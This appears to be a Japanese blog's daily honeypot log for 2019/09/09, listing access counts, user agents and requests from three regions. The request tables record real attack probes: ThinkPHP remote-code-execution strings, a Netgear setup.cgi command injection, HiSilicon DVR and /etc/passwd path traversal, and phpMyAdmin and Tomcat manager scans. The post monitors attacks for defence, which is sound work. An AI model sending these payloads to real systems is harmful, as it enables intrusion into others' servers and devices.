2019/09/09 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2019/09/09分です。

HiSilicon DVR Devicesの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
110[.]249[.]212[.]46に関する不正通信
を確認しました。

HiSilicon DVR Devicesの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
zgrabによるスキャン行為
を確認しました。

ThinkPHPの脆弱性を狙うアクセス
5[.]188[.]210[.]101に関する不正通信
を確認しました。

AP：総アクセス数：47 (前日比：-1)
US：総アクセス数：139 (前日比：+7)
EU：総アクセス数：15 (前日比：-5)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

送信元IPアドレス一覧

UserAgent一覧

件数	UserAgent
25	-
3	Go-http-client/1.1
1	Mozilla/5.0
1	Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
8	Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数	Method	Request	Protocol
1	GET	/admin.php	HTTP/1.1
6	GET	http://110[.]249[.]212[.]46/testget?q=23333&port=80	HTTP/1.1
5	GET	/lang/en/html/index.html	HTTP/1.1
1	GET	/Lists/admin.php	HTTP/1.1
3	GET	/manager/html	HTTP/1.1
3	GET	/manager/text/list	HTTP/1.1
13	GET	../../mnt/custom/ProductDefinition	HTTP
1	GET	/robots.txt	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1	HTTP/1.1
3	GET	/TP/index.php	HTTP/1.1
3	GET	/TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
3	GET	/TP/public/index.php	HTTP/1.1
3	POST	/TP/index.php?s=captcha	HTTP/1.1
1	\x03

送信元IPアドレス一覧

UserAgent一覧

件数	UserAgent
25	-
9	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
101	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
4	Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数	Method	Request	Protocol
1	GET	/admin.php	HTTP/1.1
1	GET	../../etc/passwd	HTTP/1.1
2	GET	/lang/en/html/index.html	HTTP/1.1
1	GET	/Lists/admin.php	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/manager/text/list	HTTP/1.1
21	GET	../../mnt/custom/ProductDefinition	HTTP
1	GET	../../mnt/custom/ProductDefinition	HTTP/1.1
2	GET	/mysql/admin/index.php?lang=en	HTTP/1.1
2	GET	/mysql/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/mysqlmanager/index.php?lang=en	HTTP/1.1
2	GET	/mysql/sqlmanager/index.php?lang=en	HTTP/1.1
101	GET	/phpmyadmin/	HTTP/1.1
1	GET	/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyadmin/index.php?lang=en	HTTP/1.1

送信元IPアドレス一覧

UserAgent一覧

件数	UserAgent
2	-
1	Go-http-client/1.1
1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2	Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数	Method	Request	Protocol
1	GET	/elrekt.php	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	http://5[.]188[.]210[.]101/echo.php	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/lang/en/html/index.html	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/manager/text/list	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1
1	\x03